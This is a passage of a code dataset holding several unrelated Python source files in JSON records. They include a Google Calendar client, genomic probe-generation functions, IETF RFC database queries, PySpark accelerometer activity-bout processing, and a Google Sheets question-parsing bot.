time\r\n print('Getting the upcoming 10 events')\r\n eventsResult = service.events().list(\r\n calendarId='primary', timeMin=now, maxResults=10, singleEvents=True,\r\n orderBy='startTime').execute()\r\n \r\n events = eventsResult.get('items', [])\r\n\r\n if not events:\r\n print('No upcoming events found.')\r\n for event in events:\r\n start = event['start'].get('dateTime', event['start'].get('date'))\r\n print(start, event['summary'])\r\n\r\n \r\n while True:\r\n calendar_list = service.calendarList().list(\r\n pageToken=page_token).execute()\r\n for calendar_list_entry in calendar_list['items']:\r\n \r\n print(calendar_list_entry['summary'])\r\n \r\n calendarId = calendar_list_entry['id']\r\n if calendarId == _calendar_id:\r\n _found_calendar = calendar_list_entry\r\n break\r\n \r\n \r\n page_token = calendar_list.get('nextPageToken')\r\n if not page_token:\r\n break\r\n \r\n _found_calendar\r\n \r\n except client.AccessTokenRefreshError:\r\n print('The credentials have been revoked or expired, please re-run'\r\n 'the application to re-authorize.')\r\n\r\nif __name__ == '__main__':\r\n main(sys.argv)","repo_name":"MamieLora/TOCS2017","sub_path":"KeeeXClient/src/GoogleCalendarClient/ListEvents.py","file_name":"ListEvents.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"25852159732","text":"\"\"\"Functions for generating lists of candidate probes from sequences.\n\nThese functions compute lists of many (likely redundant) probes, termed\ncandidate probes, from a sequence of list of sequences.\n\"\"\"\n\nimport logging\nimport re\nimport sys\n\nimport numpy as np\n\nfrom catch import probe\nfrom catch.utils import seq_io\n\n__author__ = 'Hayden Metsky '\n\nlogger = logging.getLogger(__name__)\n\n\ndef make_candidate_probes_from_sequence(seq,\n probe_length,\n probe_stride,\n min_n_string_length=2,\n allow_small_seqs=None):\n \"\"\"Generate a list of candidate probes from a sequence.\n\n It is possible (especially when there are strings of N's) that\n duplicate probes are returned.\n\n Args:\n seq: sequence as a string or np.array from which to generate\n candidate probes\n probe_length: generate candidate probes with this 
number of bp\n probe_stride: generate probes from seq separated by this number\n of bp\n min_n_string_length: possible probes that would contain strings\n of this number or more N's are discarded and, instead, new\n probes flanking the string are added\n allow_small_seqs: if set, allow sequences that are smaller than the\n probe length by creating candidate probes equal to the sequence;\n the value gives the minimum allowed probe (sequence) length\n\n Returns:\n list of candidate probes as instances of probe.Probe\n \"\"\"\n n_string_query = re.compile('(N{' + str(min_n_string_length) + ',})')\n\n if len(seq) < probe_length:\n if allow_small_seqs:\n if len(seq) < allow_small_seqs:\n raise ValueError((\"Allowing sequences smaller than the probe \"\n \"length (\" + str(probe_length) + \"), but \"\n \"input sequence is smaller than minimum \"\n \"allowed length\"))\n else:\n if n_string_query.search(seq):\n raise Exception((\"Only possible probe from input \"\n \"sequence has too long a stretch of N's\"))\n else:\n # Make a probe equal to this sequence\n return [probe.Probe.from_str(seq)]\n else:\n raise ValueError((\"An input sequence is smaller than the probe \"\n \"length (\" + str(probe_length) + \"); try \"\n \"setting --small-seq-skip\"))\n\n if isinstance(seq, np.ndarray):\n seq = ''.join(seq)\n\n # Make a probe based on the subsequence seq[start:end].\n # Namely, if that subsequence contains no string of N's, then it\n # is a probe to be added and the probe is returned in a single-\n # valued list. Otherwise, an empty list is returned.\n def add_probe_from_subsequence(start, end,\n is_flanking_n_string=False):\n subseq = seq[start:end]\n probes = []\n\n # Search for strings of min_n_string_length or more N's in subseq\n # and only add a probe if there is not such a string\n if not n_string_query.search(subseq):\n # There's no string of N's, so this subsequence is a valid\n # probe\n probes += [subseq]\n\n # Convert the probes from a Python list of Python strings to a\n # list of probe.Probe\n probes = [probe.Probe.from_str(p) for p in probes]\n for p in probes:\n p.is_flanking_n_string = is_flanking_n_string\n\n return probes\n\n # Populate a list of probes\n probes = []\n for start in np.arange(0, len(seq), probe_stride):\n if start + probe_length > len(seq):\n break\n probes += add_probe_from_subsequence(start, start + probe_length)\n\n if len(seq) % probe_stride != 0:\n # There are bases on the right that were never covered, so add\n # another probe for this\n probes += add_probe_from_subsequence(len(seq) - probe_length,\n len(seq))\n\n # Add probes flanking each string of N's. Specifically, add a probe\n # to the left of a string and to the right. The called function\n # must check that the flanking probe does not contain a string of\n # N's before adding. 
(Don't recursively chase flanking probes.)\n for match in n_string_query.finditer(seq):\n if match.start() - probe_length >= 0:\n # Add the left flanking probe for match\n probes += add_probe_from_subsequence(match.start() - probe_length,\n match.start(),\n is_flanking_n_string=True)\n if match.end() + probe_length <= len(seq):\n # Add the right flanking probe for match\n probes += add_probe_from_subsequence(match.end(),\n match.end() + probe_length,\n is_flanking_n_string=True)\n\n return probes\n\n\ndef make_candidate_probes_from_sequences(\n seqs,\n probe_length,\n probe_stride,\n min_n_string_length=2,\n allow_small_seqs=None,\n seq_length_to_skip=None):\n \"\"\"Generate a list of candidate probes from a list of sequences.\n\n It is possible (perhaps even likely depending on where\n the sequences come from) that duplicate probes are returned.\n\n Args:\n seqs: list of sequences, each as a string or np.array from which\n to generate candidate probes\n probe_length: generate candidate probes with this number of bp\n probe_stride: generate probes from each sequence separated by this\n number of bp\n min_n_string_length: possible probes that would contain strings\n of this number or more N's are discarded and, instead, new\n probes flanking the string are added\n allow_small_seqs: if set, allow sequences that are smaller than the\n probe length by creating candidate probes equal to the sequence;\n the value gives the minimum allowed probe (sequence) length\n seq_length_to_skip: if set, skip sequences whose length is <=\n the given value (i.e., do not design candidate probes for\n them)\n\n Returns:\n list of candidate probes as instances of probe.Probe\n \"\"\"\n if not isinstance(seqs, list):\n raise TypeError(\"seqs must be a list of sequences\")\n if len(seqs) == 0:\n raise ValueError(\"seqs must have at least one sequence\")\n for seq in seqs:\n if not isinstance(seq, str):\n raise TypeError(\"seqs must be a list of Python strings\")\n\n probes = []\n for seq in seqs:\n if seq_length_to_skip is not None:\n if len(seq) <= seq_length_to_skip:\n logger.info((\"Not designing candidate probes for a \"\n \"sequence with length %d, since it is <= %d\"),\n len(seq), seq_length_to_skip)\n continue\n\n probes += make_candidate_probes_from_sequence(\n seq,\n probe_length=probe_length,\n probe_stride=probe_stride,\n min_n_string_length=min_n_string_length,\n allow_small_seqs=allow_small_seqs)\n\n return probes\n","repo_name":"broadinstitute/catch","sub_path":"catch/filter/candidate_probes.py","file_name":"candidate_probes.py","file_ext":"py","file_size_in_byte":7463,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"36"} +{"seq_id":"36386987899","text":"#!/usr/bin/env python3\nfrom ietf.sql.bcp import Bcp\nfrom ietf.sql.fyi import Fyi\nfrom ietf.sql.rfc import Rfc\nfrom ietf.sql.rfc_not_issued import RfcNotIssued\nfrom ietf.sql.std import Std\nfrom ietf.xml.enum import DocumentType\n\n\ndef query_rfc(session, number):\n row = session.query(Rfc).\\\n filter(Rfc.id == number).\\\n one_or_none()\n return row\n\n\ndef query_rfc_updates(session, number):\n \"\"\"Return the most up-to-date document for RFC `number`.\"\"\"\n orig = query_rfc(session, number)\n # If there are no updates then return the original\n if (orig is None) or (not orig.updated_by):\n return orig\n # Else return the latest document\n else:\n update_doc = orig.updated_by[-1]\n update_type = update_doc.doc_type\n update_id = update_doc.doc_id\n if update_type is DocumentType.RFC:\n return 
query_rfc(session, update_id)\n elif update_type is DocumentType.STD:\n return query_std(session, update_id)\n elif update_type is DocumentType.BCP:\n return query_bcp(session, update_id)\n elif update_type is DocumentType.FYI:\n return query_fyi(session, update_id)\n else:\n return orig\n\n\ndef query_rfc_obsoletes(session, number):\n \"\"\"Return the latest RFC that obsoletes `number` if such an RFC exists,\n otherwise return RFC `number`.\"\"\"\n # Lookup RFC `number`\n cur_rfc = query_rfc(session, number)\n # If there is no updated_by then return the original\n if (cur_rfc is None) or (not cur_rfc.obsoleted_by):\n return cur_rfc\n # Else recurse\n else:\n obsoleting_id = cur_rfc.obsoleted_by[-1].doc_id\n return query_rfc_obsoletes(session, obsoleting_id)\n\n\ndef query_rfc_see_also(session, number):\n return None\n\n\ndef query_rfc_not_issued(session, number):\n \"\"\"Return an RfcNotIssued object or None.\"\"\"\n row = session.query(RfcNotIssued).\\\n filter(RfcNotIssued.id == number).\\\n one_or_none()\n return row\n\n\ndef query_std(session, number):\n row = session.query(Std).\\\n filter(Std.id == number).\\\n one_or_none()\n return row\n\n\ndef query_bcp(session, number):\n row = session.query(Bcp).\\\n filter(Bcp.id == number).\\\n one_or_none()\n return row\n\n\ndef query_fyi(session, number):\n row = session.query(Fyi).\\\n filter(Fyi.id == number).\\\n one_or_none()\n return row\n","repo_name":"lafrenierejm/ietf-cli","sub_path":"ietf/utility/query_doc.py","file_name":"query_doc.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"10705832440","text":"from pyspark.sql import SparkSession\nfrom pyspark.sql import functions as F\nfrom datetime import datetime, timedelta\nfrom pyspark.sql.window import Window\nfrom pyspark.sql.types import TimestampType\nfrom pyspark.sql.types import IntegerType\nimport datefinder\nimport time\n\n##########################################################################################################\n\ndef queryrows(df, string):\n \"\"\"\n Select the rows which match a given string.\n\n :param df:\n Spark DataFrame object containing the accelerometer raw data\n :param string:\n matching string\n :return:\n Spark DataFrame object with filtered values\n \"\"\"\n\n filter_value = df.schema.names[0] + \" like '%\" + string + \"%'\"\n\n return df.filter(filter_value).collect()[0][0]\n\n\n##########################################################################################################\n\ndef gen_acc_dataframe(df, ts_name):\n \"\"\"\n Generate accelerometer DataFrame from raw data with timestamp column.\n\n :param df:\n Spark DataFrame object containing the accelerometer raw data\n :param ts_name:\n name of timestamp column\n :return:\n input data epoch, Spark DataFrame object with timestamp data\n \"\"\"\n\n ## extract metadata from RDD object\n start_date = queryrows(df, 'Start Date').split()[2]\n start_time = queryrows(df, 'Start Time').split()[2]\n interval = queryrows(df, 'Period').split()[3]\n dateformat = queryrows(df, 'Data File Created By').split()\n\n if len(dateformat) < 14:\n\n dt = datefinder.find_dates(start_date + \" \" + start_time)\n start_timestamp = [ts for ts in dt][0]\n\n else:\n\n date_dict = {'M/d/yyyy': ['%m/%d/%Y', '%m/%d/%Y'],\n 'dd-MMM-yy': ['%d/%m/%Y', '%d-%b-%y'],\n 'dd-MM-yyyy': ['%d/%m/%Y', '%d-%m-%Y'],\n 'dd/MM/yyyy': ['%d/%m/%Y', '%d/%m/%Y']\n }\n\n dt = dateformat[13]\n datetime_format = [date_dict[dt][0] + ' 
%H:%M:%S', date_dict[dt][1] + ' %H:%M:%S']\n start_timestamp = datetime.strptime(start_date + \" \" + start_time, datetime_format[0])\n\n x = time.strptime(interval, '%H:%M:%S')\n\n interval_sec = timedelta(hours=x.tm_hour, minutes=x.tm_min, seconds=x.tm_sec)\n\n ## extract accelerometer data from RDD object\n acc_data = df.filter(\"not value like '%Current%'\")\n acc_data = acc_data.filter(\"not value like '%Axis%'\")\n acc_data = acc_data.filter(\"value like '%,%'\") # TODO: change 'value' as 'df.schema.names[0]'\n acc_data = acc_data.cache()\n acc_data = acc_data.checkpoint()\n acc_data.count()\n acc_data = acc_data.selectExpr('value as acc_data') # change column name to 'acc_data'\n acc_data = acc_data.withColumn('id', F.monotonically_increasing_id())\n\n app_fun = F.udf(lambda k: start_timestamp + k * interval_sec, TimestampType())\n\n acc_data = acc_data.withColumn(ts_name, app_fun(acc_data['id'])).select([ts_name, 'acc_data'])\n\n return interval_sec.seconds, acc_data\n\n\n##########################################################################################################\n\ndef split_acc_data(df, col_list):\n \"\"\"\n Reads string of data from accelerometer DataFrame.\n\n :param df:\n Spark DataFrame object with timestamp data\n :param col_list:\n list of feature names matching accelerometer data\n :return:\n Spark DataFrame object with timestamp data\n \"\"\"\n\n df = df.cache()\n df = df.checkpoint()\n df.count()\n\n cols = F.split(df['acc_data'], r',')\n\n for k, item in enumerate(col_list):\n df = df.withColumn(item, cols.getItem(k).cast(dataType=IntegerType()))\n\n df = df.drop('acc_data')\n\n return df\n\n\n##########################################################################################################\n\ndef activity_count(df, datetime_col, interval, LightCO, ModerateCO, HardCO, VeryHardCO, incl_acc=False):\n \"\"\"\n Return activity count calculated from accelerometer data.\n\n :param df:\n Spark DataFrame object with timestamp data\n :param datetime_col:\n column with timestamp data\n :param interval:\n epoch duration (in seconds)\n :param LightCO:\n light activity cutoff value\n :param ModerateCO:\n moderate activity cutoff value\n :param HardCO:\n hard activity cutoff value\n :param VeryHardCO:\n very hard activity cutoff value\n :param incl_acc:\n if true, all raw accelerometer data are included in the DataFrame\n :return:\n Spark DataFrame object with timestamp data\n \"\"\"\n\n df = df.cache()\n df = df.checkpoint()\n df.count()\n\n cols = df.columns\n\n app_fun = F.udf(lambda x: activity_index(x, interval, LightCO, ModerateCO, HardCO, VeryHardCO))\n\n ## use the axis1 or vectMag to determine the activity count\n df = df.withColumn('activity', F.col(cols[1]))\n\n df = df.withColumn('activityIntensity', app_fun(df['activity'])).orderBy(datetime_col)\n\n cols.insert(1, 'activity')\n\n cols.insert(2, 'activityIntensity')\n\n if not incl_acc:\n\n df = df.select(cols[0:3]).orderBy(datetime_col)\n\n else:\n\n df = df.select(cols).orderBy(datetime_col)\n\n return df\n\n\n##########################################################################################################\n\ndef activity_index(AC, interval, LightCO, ModerateCO, HardCO, VeryHardCO):\n \"\"\"\n Calculate activity intensity level using Freedson adult cut points (Freedson, Melanson, & Sirard, 1998).\n\n :param AC:\n activity count per epoch\n :param interval:\n epoch duration (in seconds)\n :param LightCO:\n light activity cutoff value\n :param ModerateCO:\n moderate activity cutoff value\n 
:param HardCO:\n hard activity cutoff value\n :param VeryHardCO:\n very hard activity cutoff value\n :return:\n integer value corresponding to the activity intensity\n \"\"\"\n\n ## assume epoch smaller than 1 minute\n assert interval <= 60, \"Epoch larger than 1 minute.\"\n\n ## normalize the cutoffs per epoch\n n = 60 / interval\n VeryHardCO = VeryHardCO / n\n HardCO = HardCO / n\n ModerateCO = ModerateCO / n\n LightCO = LightCO / n\n\n if AC == -1:\n act_index = -1 # state unknown\n elif AC == -2:\n act_index = -2 # not wearing device\n elif 0 <= AC < LightCO:\n act_index = 0 # sedentary\n elif LightCO <= AC < ModerateCO:\n act_index = 1 # light activity\n elif ModerateCO <= AC < HardCO:\n act_index = 2 # moderate activity\n elif HardCO <= AC < VeryHardCO:\n act_index = 3 # hard activity\n else:\n act_index = 4 # very hard activity\n\n return act_index\n\n\n##########################################################################################################\n### NOT USED ###\ndef datetime_filter(df, param_name, param_value, datetime_name, time_w=90, step=90 * 60):\n \"\"\"\n Remove rows in DataFrame which match a condition within a given time interval.\n\n :param df:\n Spark DataFrame object with timestamp data\n :param param_name:\n parameter name\n :param param_value:\n parameter value for conditional statement\n :param datetime_name:\n column with timestamp data\n :param time_w:\n tumbling window duration (in minutes)\n :param step:\n sliding interval (in seconds)\n :return:\n Spark DataFrame object with timestamp data\n \"\"\"\n\n ## tumbling window size\n tw = str(time_w) + ' minutes'\n\n ## sliding window size\n sw = str(step) + ' seconds'\n\n ## offset (in seconds)\n offset = str(0) + ' seconds'\n\n intervals_df = df.groupBy(F.window(datetime_name, '{}'.format(tw), '{}'.format(sw), '{}'.format(offset))) \\\n .avg(param_name) \\\n .sort('window.start') \\\n .filter(F.col('avg({})'.format(param_name)) == param_value) \\\n .select('window') \\\n .withColumn('start', F.col('window').start) \\\n .withColumn('end', F.col('window').end) \\\n .drop('window')\n\n \"\"\"\n schema of internal_df:\n \n root\n |-- start: timestamp (nullable = true)\n |-- end: timestamp (nullable = true)\n \"\"\"\n\n ## transform dataframe into list of pyspark.sql.types.Row objects\n intervals_list = intervals_df.collect()\n\n ## filter dataframe excluding the selected intervals\n for row in intervals_list:\n df = df.filter(~F.col(datetime_name).between(row[0], row[1]))\n\n return intervals_df, df\n\n\n##########################################################################################################\n### NOT USED ###\ndef start_time_offset(df):\n \"\"\"\n Return the offset to start a tumbling window from the first timestamp of the DataFrame.\n\n :param df:\n Spark DataFrame object with timestamp data\n :return:\n number of seconds\n \"\"\"\n\n ## notice: the resulting offset must be smaller than the tumbling window\n st_date = df.first()[0]\n st_min = st_date.minute\n st_sec = st_date.second\n start_time = (st_min - 10 * (st_min // 10)) * 60 + st_sec\n offset = '{} seconds'.format(str(start_time))\n\n return offset\n\n\n##########################################################################################################\n\ndef consecutive_time(df, ts_name, interval):\n \"\"\"\n Add two columns with the start date and end date of consecutive timestamps which differ by a given interval.\n\n :param df:\n Spark DataFrame object with timestamp data\n :param ts_name:\n column with timestamp data\n 
:param interval:\n required precision (in seconds)\n :return:\n Spark DataFrame object with timestamp data\n \"\"\"\n\n df_ = df.withColumn(\"rn\", F.row_number().over(Window.orderBy('{}'.format(ts_name))))\n\n df_ = df_.cache()\n df_ = df_.checkpoint()\n df_.count()\n\n df_.createOrReplaceTempView('df_')\n\n spark = SparkSession.builder.getOrCreate()\n\n df_ = spark.sql(\"\"\" WITH tmp AS(\n SELECT *, BIGINT({}) - rn * {} AS totsec\n FROM df_)\n SELECT *, MIN({}) OVER(PARTITION BY totsec) AS start, \n MAX({}) OVER(PARTITION BY totsec) AS end,\n ROW_NUMBER() OVER(PARTITION BY totsec ORDER BY {}) AS id\n FROM tmp\n \"\"\".format(ts_name, str(interval), ts_name, ts_name, ts_name)).drop('totsec').drop('rn')\n\n df_.createOrReplaceTempView('df_')\n\n df_ = spark.sql(\"\"\" SELECT *, BIGINT(start) - LAG(BIGINT(end),1,BIGINT(end)) OVER(ORDER BY timestamp) AS pause\n FROM df_\n \"\"\")\n\n return df_\n\n\n##########################################################################################################\n\ndef detect_bouts(df, ts_name, col_name, new_col, interval, UP, LOW, DURATION, TOL):\n \"\"\"\n Create a new column based on filters on timestamps.\n\n :param df:\n Spark DataFrame object with timestamp data\n :param ts_name:\n column with timestamp data\n :param col_name:\n column on which the filter must be applied\n :param new_col:\n column with applied filters\n :param interval:\n epoch duration (in seconds)\n :param UP:\n upper limit of activity count per minute\n :param LOW:\n lower limit of activity count per minute\n :param DURATION:\n minimum bout duration (in minutes)\n :param TOL:\n tolerance (in minutes)\n :return:\n Spark DataFrame object with timestamp data\n \"\"\"\n\n ## assume one epoch smaller than 1 minute\n assert interval <= 60, \"Epoch larger than 1 minute.\"\n\n ## number of epochs per minute\n n = 60 / interval\n\n ## bounds on measured quantitity per epoch\n up, low = (UP / n, LOW / n)\n\n ## convert tolerance in seconds\n tol = TOL * 60\n\n ## number of epoch in tolerance interval\n epochs_tol = tol / interval\n\n ## convert minimum bout duration in seconds\n duration = DURATION * 60\n\n ## Number of epochs in minimum bout duration\n epochs_min_bout = duration / interval\n\n ## filter dataframe with: low <= col_name <= up\n inbout = (F.col('{}'.format(col_name)) >= low) & (F.col('{}'.format(col_name)) <= up)\n df1 = df.filter(inbout).orderBy('{}'.format(ts_name))\n df1.checkpoint()\n\n ## determine consecutive timestamps in df1\n df1 = consecutive_time(df1, '{}'.format(ts_name), interval)\n df1 = df1.selectExpr(['{}'.format(ts_name), 'start as activity_start'])\n\n pause_list = 0\n\n if TOL > 0:\n ## filter data with col_name < low and col_name > up\n df2 = df.filter(~inbout).orderBy('{}'.format(ts_name))\n df2 = df2.cache()\n df2 = df2.checkpoint()\n df2.count()\n\n ## determine consecutive timestamps in df2\n df2 = consecutive_time(df2, '{}'.format(ts_name), interval)\n df2 = df2.selectExpr(['{}'.format(ts_name), 'start as pause_start'])\n\n ## filter periods larger than tolerance\n df2 = df2.groupBy('pause_start').count()\n df2 = df2.filter(df2['count'] > epochs_tol).orderBy('pause_start')\n df2 = df2.withColumn('pause_end', (F.col('pause_start').cast(IntegerType()) +\n (F.col('count') - 1) * interval).cast(TimestampType())\n ).drop('count')\n\n pause_list = df2.collect()\n\n ## merge df1 to the accelerometer dataframe\n df3 = df.join(df1, ['{}'.format(ts_name)], 'leftouter')\n df3.checkpoint()\n\n if TOL > 0:\n\n ## assign pause periods\n df3 = 
df3.withColumn('pause', F.lit(0))\n\n for row in pause_list:\n df3 = df3.withColumn('pause', F.when((F.col('{}'.format(ts_name)) >= row['pause_start']) &\n (F.col('{}'.format(ts_name)) <= row['pause_end']),\n 1).otherwise(F.col('pause'))\n )\n\n ## assign previous non-zero 'start' to missing values given 'pause' < tolerance\n df3 = df3.withColumn('activity_start', F.when((F.col('activity_start').isNull()) &\n (F.col('pause') == 0),\n F.last(F.col('activity_start'), ignorenulls=True)\n .over(Window.orderBy(ts_name))\n ).otherwise(F.col('activity_start'))\n ).drop('pause')\n\n ## define a flag to select rows with non-zero 'activity_start'\n df3 = df3.withColumn('check', F.when(F.col('activity_start').isNotNull(), F.lit(1)).otherwise(F.lit(0)))\n\n ## select rows with non-zero 'activity_start'\n df2 = df3.select(['{}'.format(ts_name), 'check']).filter(F.col('check') == 1)\n\n ## assign bout start\n df2 = consecutive_time(df2, '{}'.format(ts_name), interval).selectExpr(\n ['{}'.format(ts_name), 'start as bout_start'])\n\n ## assign bout to dataframe\n df3 = df3.join(df2, ['{}'.format(ts_name)], 'leftouter').drop(*['activity_start', 'check'])\n\n df3 = df3.withColumn('bout_start', F.when(F.col('bout_start').isNull(),\n F.col(ts_name)\n ).otherwise(F.col('bout_start'))\n )\n\n ## filter periods larger than the minimum bout duration\n df1 = df3.groupBy('bout_start').count()\n df1.checkpoint()\n\n df1 = df1.filter(df1['count'] > epochs_min_bout).orderBy('bout_start')\n\n df1 = df1.withColumn('bout_end', (F.col('bout_start').cast(IntegerType()) +\n F.col('count') * interval).cast(TimestampType())\n ).drop('count')\n\n df1 = df1.withColumn(new_col, F.row_number().over(Window.orderBy('bout_start')))\n\n bouts_list = df1.collect()\n\n ## initialize activityBoutNumber to zero\n df3 = df3.drop(*['start', 'end', 'check', 'pause', 'bout_start'])\n\n df3 = df3.withColumn(new_col, F.lit(0))\n\n df3.checkpoint()\n\n ## assign activityBoutNumber\n for row in bouts_list:\n df3 = df3.withColumn(new_col, F.when((F.col('{}'.format(ts_name)) >= row['bout_start']) &\n (F.col('{}'.format(ts_name)) <= row['bout_end']),\n row[new_col]\n ).otherwise(F.col(new_col))\n )\n\n df3 = df3.orderBy('{}'.format(ts_name))\n\n return df3\n\n\n##########################################################################################################\n\ndef select_acc_intervals(df, ts_name, interval, window, incl_vect=False, incl_acc=False):\n \"\"\"\n Filter DataFrame with a new epoch duration.\n\n :param df:\n Spark DataFrame object with timestamp data\n :param ts_name:\n column with timestamp data\n :param interval:\n initial epoch duration (in seconds)\n :param window:\n new epoch duration (in seconds)\n :param incl_vect:\n if true, calculate vector magnitude and include it in the DataFrame\n :param incl_acc:\n if true, all raw accelerometer data are included in the DataFrame\n :return:\n Spark DataFrame object with timestamp data\n \"\"\"\n\n ## the window must be larger tha a single epoch\n assert interval <= 60, \"Epoch larger than 1 minute.\"\n assert window >= interval, \"Window smaller than epoch.\"\n\n cols = df.columns\n selected_cols = ['axis1', 'axis2', 'axis3', 'steps'] # TODO: add eeAccumulator\n\n minp = df.select(F.min(ts_name).cast('long')).first()[0]\n\n if interval < window:\n\n df2 = df.withColumn('tmp', F.row_number().over(Window.orderBy(ts_name)) - 1)\n\n df2 = df2.withColumn('total_sec', F.col(ts_name).cast('long')).cache()\n df2 = df2.checkpoint()\n df2.count()\n\n for col in selected_cols:\n\n df2 = 
df2.withColumn(col, F.when(((F.col('total_sec') - minp) % window == 0),\n F.sum(col).over(Window.orderBy('total_sec')\n .rangeBetween(0, window - interval)\n )\n ).otherwise(0)\n )\n\n df2 = df2.withColumn('duration', F.col(ts_name).cast(IntegerType()) -\n F.lag(F.col(ts_name).cast(IntegerType()), 1, minp)\n .over(Window.orderBy(ts_name))\n ).drop('total_sec')\n\n df2 = df2.withColumn('tmp', (F.col('tmp') * F.col('duration')) % window).drop('duration').orderBy(ts_name)\n\n df2 = df2.filter(F.col('tmp') == 0).drop('tmp').orderBy(ts_name)\n\n else:\n\n df2 = df\n\n if incl_vect:\n\n df2 = df2.withColumn('vectMag', F.sqrt(F.col('axis1') ** 2 + F.col('axis2') ** 2 + F.col('axis3') ** 2))\n\n cols.insert(1, 'vectMag')\n\n df2 = df2.select(cols).orderBy(ts_name)\n\n if not incl_acc:\n\n df2 = df2.select(ts_name, cols[1])\n\n return df2\n\n\n##########################################################################################################\n\ndef non_wear_filter(df, ts_name, AC_name, AI_name, interval, DURATION):\n \"\"\"\n Determine non-wearing periods, for which activity count and activity intensity are set to -2.\n\n :param df:\n Spark DataFrame object with timestamp data\n :param ts_name:\n column with timestamp data\n :param AC_name:\n column with activity count values\n :param AI_name:\n column with activity intensity values\n :param interval:\n epoch duration (in seconds)\n :param DURATION:\n non-wearing period (in seconds)\n :return:\n Spark DataFrame object with timestamp data\n \"\"\"\n\n ## select valid epochs with non-negative activity count\n df1 = df.filter(F.col(AC_name) >= 0)\n\n df1 = df1.cache()\n df1 = df1.checkpoint()\n df1.count()\n\n TOL = 0\n\n UP = 0\n\n LOW = 0\n\n new_col = 'no_wear'\n\n df1 = detect_bouts(df, ts_name, AC_name, new_col, interval, UP, LOW, DURATION, TOL)\n\n df1 = df1.select([ts_name, new_col])\n\n ## merge new column with the DataFrame and assign zero to missing values\n df2 = df.join(df1, [ts_name], 'leftouter').orderBy(ts_name).fillna(0, subset=[new_col])\n\n df2 = df2.cache()\n df2 = df2.checkpoint()\n df2.count()\n\n ## set activity count and activity intensity to -2 for invalid data\n df2 = df2.withColumn(AC_name, F.when(F.col(new_col) > 0, -2).otherwise(F.col(AC_name)))\n\n df2 = df2.withColumn(AI_name, F.when(F.col(new_col) > 0, -2).otherwise(F.col(AI_name))).drop(new_col)\n\n return df2\n\n\n##########################################################################################################\n\ndef activity_bout_filter(df, ts_name, AC_name, new_col, interval, UP, LOW, DURATION, TOL):\n \"\"\"\n Detect activity bouts.\n\n :param df:\n Spark DataFrame object with timestamp data\n :param ts_name:\n column with timestamp data\n :param AC_name:\n column with activity count values\n :param new_col:\n column with applied filters\n :param interval:\n epoch duration (in seconds)\n :param UP:\n upper limit of activity count per minute\n :param LOW:\n lower limit of activity count per minute\n :param DURATION:\n minimum bout duration (in minutes)\n :param TOL:\n tolerance (in minutes)\n :return:\n Spark DataFrame object with timestamp data\n \"\"\"\n\n ## select valid epochs with non-negative activity count\n df1 = df.filter(F.col(AC_name) >= 0)\n\n df1 = df1.cache()\n df1 = df1.checkpoint()\n df1.count()\n\n df1 = detect_bouts(df, ts_name, AC_name, new_col, interval, UP, LOW, DURATION, TOL)\n\n df1 = df1.select([ts_name, new_col])\n\n ## merge new column with the dataframe and assign zero to missing values\n df2 = 
df.join(df1, [ts_name], 'leftouter').orderBy(ts_name).fillna(0, subset=[new_col])\n\n return df2\n\n\n##########################################################################################################\n\ndef sedentary_bout_filter(df, ts_name, AC_name, new_col, interval, UP, LOW, DURATION, TOL):\n \"\"\"\n Detect sedentary bouts.\n\n :param df:\n Spark DataFrame object with timestamp data\n :param ts_name:\n column with timestamp data\n :param AC_name:\n column with activity count values\n :param new_col:\n column with applied filters\n :param interval:\n epoch duration (in seconds)\n :param UP:\n upper limit of activity count per minute\n :param LOW:\n lower limit of activity count per minute\n :param DURATION:\n minimum bout duration (in minutes)\n :param TOL:\n tolerance (in minutes)\n :return:\n Spark DataFrame object with timestamp data\n \"\"\"\n\n ## select valid epochs with non-negative activity count\n df1 = df.filter(F.col(AC_name) >= 0)\n\n df1 = df1.cache()\n df1 = df1.checkpoint()\n df1.count()\n\n df1 = detect_bouts(df, ts_name, AC_name, new_col, interval, UP, LOW, DURATION, TOL)\n\n df1 = df1.select([ts_name, new_col])\n\n ## merge new column with the dataframe and assign zero to missing values\n df2 = df.join(df1, [ts_name], 'leftouter').orderBy(ts_name).fillna(0, subset=[new_col])\n\n return df2\n\n##########################################################################################################\n","repo_name":"emolinaro/PALMSpy","sub_path":"src/AccProcessing.py","file_name":"AccProcessing.py","file_ext":"py","file_size_in_byte":23607,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"36"}
+{"seq_id":"8097923076","text":"import pygsheets\nfrom secret import secret\nimport os\n\nclass QuestionParse:\n def __init__(self):\n self.file = pygsheets.authorize(client_secret=os.path.join(os.getcwd(), '/secret/credit.json'))\n self.file = self.file.open_by_key(secret.file_id)\n self.table = self.file.worksheet('index', 0)\n\n # if flag == True, then all values are parsed,\n # if flag == False, then the function will return only new values\n def __parse(self, flag: bool):\n array = self.table.get_all_values(returnas='matrix')\n array = list(filter(\n lambda x: (x[0] != '') and ((str(x[6]).replace(\" \", \"\") not in {'Обработан', 'обработан'}) or flag), array)\n )\n return array\n\n def __prepare_string(self, array):\n array = array[1::]\n result = \"сообщения в количестве {} штук \\n\".format(len(array))\n iteration_str = \"Время: {} \\n\" \\\n \"ФИО: {} \\n\" \\\n \"Почта: {} \\n\" \\\n \"Курс: {} \\n\" \\\n \"Группа: {} \\n\" \\\n \"Вопрос: {} \\n\" \\\n \"---------------\\n\"\n for val in array:\n result += iteration_str.format(\n val[0],\n val[1],\n val[2],\n val[3],\n val[4],\n val[5]\n )\n\n return result\n\n def get_new_messages(self):\n array = self.__parse(False)\n if len(array) < 2:\n return \"Нет новых сообщений\"\n return \"Новые \" + self.__prepare_string(array)\n\n def get_all_messages(self):\n array = self.__parse(True)\n return \"Все \" + self.__prepare_string(array)\n","repo_name":"vgtstptlk/question_bot","sub_path":"QuestionParse.py","file_name":"QuestionParse.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"12366361212","text":"#!/usr/bin/env python\n\nimport locale\nimport sys\nimport six\n\n\n# Below causes issues in some locales and no one knows why it was included, so it is commented out for now\n# 
